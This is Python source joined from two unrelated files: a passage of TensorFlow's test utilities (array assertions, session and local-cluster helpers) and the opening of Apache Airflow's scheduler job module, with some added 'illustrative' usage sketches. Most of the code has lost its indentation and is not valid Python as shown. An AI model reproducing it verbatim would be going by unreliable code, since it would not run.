a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate lines. A line of ellipses (...) will be appended at the end if the
number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
else:
arrays = target
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = allow_soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
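# Illustrative end-to-end sketch (hypothetical test names, not part of the
# original file): a typical test built on TensorFlowTestCase, combining
# `cached_session`, `evaluate` and the numpy-aware assertions defined above.
class _ExampleTensorFlowTest(TensorFlowTestCase):
  def testNumpyAwareAssertions(self):
    # The assertions accept anything convertible to an ndarray, so plain
    # Python lists and numpy arrays work without building a graph.
    self.assertAllClose([1.0, 2.0, 3.0], np.array([1.0, 2.0, 3.0 + 1e-8]))
    self.assertAllInRange(np.array([0.1, 0.5, 0.9]), 0.0, 1.0)
  def testEvaluateInsideCachedSession(self):
    with self.cached_session():
      # `evaluate` works both in graph mode (through the cached session) and
      # in eager mode, so the same body runs under either.
      value = self.evaluate(ops.convert_to_tensor([2.0, 4.0]))
      self.assertAllEqual(value, [2.0, 4.0])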
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used to
instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name, or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
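# Minimal sketch (illustrative only, hypothetical helper): looking up a NodeDef
# by name in a hand-built GraphDef proto.
def _example_lookup_node():
  graph_def = graph_pb2.GraphDef()
  graph_def.node.add(name="x", op="Placeholder")
  graph_def.node.add(name="y", op="Identity", input=["x"])
  # Returns the NodeDef named "y"; an unknown name would yield None.
  return get_node_def_from_graph("y", graph_def)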
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer == producer_version
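# Short usage sketch (illustrative only, hypothetical helper): pinning an
# explicit producer version on a freshly created graph.
def _example_set_producer_version():
  graph = ops.Graph()
  set_producer_version(graph, 21)
  return graph.graph_def_versions.producer  # == 21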
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import sched
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
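# Illustrative helper (hypothetical, not part of the original module): the short
# aliases above are used for ORM queries throughout this file, for example to
# count the running task instances of one DAG.
def _example_count_running_tis(session: Session, dag_id: str) -> int:
    return session.query(TI).filter(TI.dag_id == dag_id, TI.state == State.RUNNING).count()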
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given file.
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
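# Hedged usage sketch (not part of the original module; the DAG file path and
# helper name are hypothetical): how calling code drives a
# DagFileProcessorProcess from start to result collection.
def _example_process_one_file():
    processor = DagFileProcessorProcess(
        file_path="/files/dags/example_dag.py",
        pickle_dags=False,
        dag_ids=None,
        callback_requests=[],
    )
    processor.start()
    # Poll until the child process reports completion over the pipe.
    while not processor.done:
        time.sleep(0.1)
    return processor.result, processor.exit_code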
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Find all tasks that have SLAs defined and send alert emails where needed.
New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
